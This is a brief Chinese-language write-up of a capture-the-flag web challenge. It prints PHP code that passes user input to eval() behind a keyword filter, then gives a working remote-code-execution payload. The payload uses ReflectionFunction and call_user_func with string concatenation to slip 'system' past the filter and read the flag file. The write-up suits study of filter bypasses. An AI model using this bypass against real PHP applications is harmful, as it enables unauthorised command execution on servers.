NepNepCTF WEB2
- 当时非预期了。做个简单的记录利用PHP反射RCE
核心代码如下:
<?php
highlight_file(__FILE__);
function waf($s) {
return preg_replace('/sys|exec|sh|flag|pass|file|open|dir|2333|;|#|\/\/|>/i', "NepnEpneP", $s);
}
if(isset($_GET['a'])) {
$_ = waf($_GET['a']);
$__ = waf($_GET['b']);
$a = new $_($__);
} else {
$a = new Error('?');
}
if(isset($_GET['c']) && isset($_GET['d'])) {
$c = waf($_GET['c']);
$d = waf($_GET['d']);
eval("\$a->$c($d);");
} else {
$c = "getMessage";
$d = "";
eval("echo \$a->$c($d);");
}
?>
- PHP反射给出的Demo简单修改一下就能执行任意函数:
<?php
$function = new ReflectionFunction('system');
echo $function->invoke("whoami");
?>
- 但是题目过滤了sys等关键字,可以另辟蹊径使用invokeArgs配合call_user_func通过拼接字符串的方式绕过过滤执行任意代码。例如:
<?php
$function = new ReflectionFunction('call_user_func');
echo $function->invokeArgs(array('s'.'y'.'s'.'tem','whoami'));
?>
- EXP
index.php?a=ReflectionFunction&b=call_user_func&c=invokeArgs&d=array(%27s%27.%27y%27.%27s%27.%27tem%27,%27cat%20/f%27.%27lag%27)